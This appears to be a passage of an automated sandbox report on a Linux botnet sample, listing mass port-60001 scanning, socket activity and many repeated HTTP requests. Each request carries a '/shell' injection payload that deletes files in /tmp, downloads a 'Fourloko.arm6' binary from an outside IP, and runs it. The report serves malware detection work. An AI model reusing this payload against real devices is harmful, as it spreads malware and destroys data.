    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 59.190.181.113:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 79.64.172.232:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 180.99.45.222:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 193.92.172.231:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 47.76.21.220:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 144.225.37.178:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 20.112.122.79:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 9.9.216.43:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 18.243.249.144:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 85.170.44.93:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 115.103.146.55:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 182.101.251.175:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 130.161.177.37:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 118.45.151.38:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 165.221.27.66:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 168.163.40.25:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 197.175.182.25:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 184.184.233.67:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 45.141.225.81:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 209.79.114.116:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 134.63.216.157:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 59.244.157.79:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 178.4.153.248:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 159.150.165.26:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 105.23.76.101:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 222.96.148.52:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 211.153.155.104:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 212.117.26.216:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 98.129.12.252:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 119.11.153.73:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 154.45.34.185:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 1.188.106.137:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 85.156.202.196:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 123.131.239.82:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 40.15.235.240:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 24.118.193.109:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 13.129.186.10:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 13.133.71.150:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 12.91.251.42:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 220.1.212.140:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 180.52.106.84:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 176.8.126.10:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 187.34.51.53:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 54.193.120.98:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 32.22.207.168:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 1.16.175.95:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 107.241.120.83:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 9.155.25.169:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 168.233.214.10:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 159.208.41.127:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 199.214.130.251:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 121.14.5.111:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 63.189.235.237:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 132.97.66.206:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 101.93.173.154:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 34.163.237.182:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 101.36.251.217:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 96.169.90.252:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 155.120.72.26:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 72.176.47.19:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 107.238.181.235:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 12.157.24.239:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 119.15.238.31:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 83.231.58.243:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 63.61.137.115:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 175.244.16.223:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 176.185.157.238:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 203.50.80.90:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 4.202.121.151:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 137.123.4.166:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 208.159.12.251:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 42.151.149.137:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 159.244.179.76:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 75.131.54.227:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 137.227.211.19:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 173.239.65.6:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 112.190.9.149:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 212.237.204.230:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 68.179.177.130:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 136.239.250.2:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 145.170.203.205:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 61.241.136.83:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 64.202.193.97:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 41.134.222.207:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 151.82.210.50:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 5.183.71.165:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 221.80.4.139:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 104.175.97.41:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 19.12.178.138:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 191.195.43.31:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 123.139.0.239:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 5.234.122.60:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 205.94.91.200:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 159.133.160.47:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 38.123.11.0:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 99.194.198.208:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 157.87.90.62:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 162.245.117.118:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 211.4.157.42:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 78.17.173.61:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 132.242.81.67:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 112.182.128.36:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 183.249.7.148:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 197.129.111.242:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 170.150.237.230:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 38.138.83.58:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 177.137.188.201:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 73.125.135.182:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 135.125.156.70:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 105.116.140.255:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 116.133.132.53:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 66.154.66.53:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 109.251.107.243:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 53.204.240.5:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 44.206.70.74:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 112.108.232.208:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 89.53.240.190:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 178.242.135.37:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 117.117.40.17:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 186.155.22.191:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 65.1.190.204:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 142.207.201.195:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 35.186.242.198:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 66.200.140.83:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 193.250.210.255:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 138.170.227.30:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 141.80.171.175:60001
    Source: /lib/systemd/systemd-journald (PID: 5308)Socket: <unknown socket type>:unknownJump to behavior
    Source: /usr/sbin/gdm3 (PID: 5502)Socket: <unknown socket type>:unknownJump to behavior
    Source: /usr/bin/dbus-daemon (PID: 5531)Socket: <unknown socket type>:unknownJump to behavior
    Source: /lib/systemd/systemd-journald (PID: 5571)Socket: <unknown socket type>:unknownJump to behavior
    Source: /lib/systemd/systemd-journald (PID: 5675)Socket: <unknown socket type>:unknownJump to behavior
    Source: /lib/systemd/systemd-journald (PID: 5772)Socket: <unknown socket type>:unknown
    Source: /usr/sbin/gdm3 (PID: 5773)Socket: <unknown socket type>:unknown
    Source: /lib/systemd/systemd (PID: 5794)Socket: <unknown socket type>:unknown
    Source: /lib/systemd/systemd-journald (PID: 5900)Socket: <unknown socket type>:unknown
    Source: /lib/systemd/systemd-journald (PID: 6004)Socket: <unknown socket type>:unknown
    Source: /usr/sbin/gdm3 (PID: 6006)Socket: <unknown socket type>:unknown
    Source: unknownNetwork traffic detected: HTTP traffic on port 35692 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 35694 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 35688 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36462
    Source: unknownNetwork traffic detected: HTTP traffic on port 35690 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35688
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35694
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35692
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35690
    Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 36462 -> 443
    Source: unknownTCP traffic detected without corresponding DNS query: 42.235.62.146
    Source: unknownTCP traffic detected without corresponding DNS query: 24.132.216.36
    Source: unknownTCP traffic detected without corresponding DNS query: 165.46.148.41
    Source: unknownTCP traffic detected without corresponding DNS query: 101.212.218.38
    Source: unknownTCP traffic detected without corresponding DNS query: 196.168.81.36
    Source: unknownTCP traffic detected without corresponding DNS query: 169.1.238.24
    Source: unknownTCP traffic detected without corresponding DNS query: 20.250.201.41
    Source: unknownTCP traffic detected without corresponding DNS query: 157.29.219.252
    Source: unknownTCP traffic detected without corresponding DNS query: 202.87.60.165
    Source: unknownTCP traffic detected without corresponding DNS query: 63.95.13.159
    Source: unknownTCP traffic detected without corresponding DNS query: 167.80.156.118
    Source: unknownTCP traffic detected without corresponding DNS query: 202.118.167.19
    Source: unknownTCP traffic detected without corresponding DNS query: 217.0.244.101
    Source: unknownTCP traffic detected without corresponding DNS query: 211.56.173.66
    Source: unknownTCP traffic detected without corresponding DNS query: 211.174.85.183
    Source: unknownTCP traffic detected without corresponding DNS query: 86.88.131.23
    Source: unknownTCP traffic detected without corresponding DNS query: 165.97.105.164
    Source: unknownTCP traffic detected without corresponding DNS query: 208.231.150.91
    Source: unknownTCP traffic detected without corresponding DNS query: 54.70.177.31
    Source: unknownTCP traffic detected without corresponding DNS query: 159.94.253.163
    Source: unknownTCP traffic detected without corresponding DNS query: 73.57.74.130
    Source: unknownTCP traffic detected without corresponding DNS query: 84.199.170.119
    Source: unknownTCP traffic detected without corresponding DNS query: 99.214.255.211
    Source: unknownTCP traffic detected without corresponding DNS query: 99.181.191.227
    Source: unknownTCP traffic detected without corresponding DNS query: 209.195.25.100
    Source: unknownTCP traffic detected without corresponding DNS query: 114.228.180.90
    Source: unknownTCP traffic detected without corresponding DNS query: 111.71.47.153
    Source: unknownTCP traffic detected without corresponding DNS query: 152.117.191.72
    Source: unknownTCP traffic detected without corresponding DNS query: 223.214.7.227
    Source: unknownTCP traffic detected without corresponding DNS query: 152.218.88.234
    Source: unknownTCP traffic detected without corresponding DNS query: 150.251.189.209
    Source: unknownTCP traffic detected without corresponding DNS query: 93.98.117.66
    Source: unknownTCP traffic detected without corresponding DNS query: 196.152.17.96
    Source: unknownTCP traffic detected without corresponding DNS query: 81.55.204.244
    Source: unknownTCP traffic detected without corresponding DNS query: 54.157.98.241
    Source: unknownTCP traffic detected without corresponding DNS query: 20.244.188.141
    Source: unknownTCP traffic detected without corresponding DNS query: 1.162.166.198
    Source: unknownTCP traffic detected without corresponding DNS query: 170.254.96.95
    Source: unknownTCP traffic detected without corresponding DNS query: 137.129.244.17
    Source: unknownTCP traffic detected without corresponding DNS query: 126.115.224.73
    Source: unknownTCP traffic detected without corresponding DNS query: 138.42.77.248
    Source: unknownTCP traffic detected without corresponding DNS query: 160.131.17.133
    Source: unknownTCP traffic detected without corresponding DNS query: 189.163.109.36
    Source: unknownTCP traffic detected without corresponding DNS query: 102.93.154.32
    Source: unknownTCP traffic detected without corresponding DNS query: 207.145.115.10
    Source: unknownTCP traffic detected without corresponding DNS query: 104.120.150.99
    Source: unknownTCP traffic detected without corresponding DNS query: 42.185.73.124
    Source: unknownTCP traffic detected without corresponding DNS query: 46.181.28.79
    Source: unknownTCP traffic detected without corresponding DNS query: 114.50.21.187
    Source: unknownTCP traffic detected without corresponding DNS query: 41.37.189.210
    Source: VAkpLB9NSDString found in binary or memory: http://upx.sf.net
    Source: syslog.354.dr, syslog.300.dr, syslog.71.dr, syslog.196.dr, syslog.234.drString found in binary or memory: https://www.rsyslog.com
    Source: unknownDNS traffic detected: queries for: daisy.ubuntu.com
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
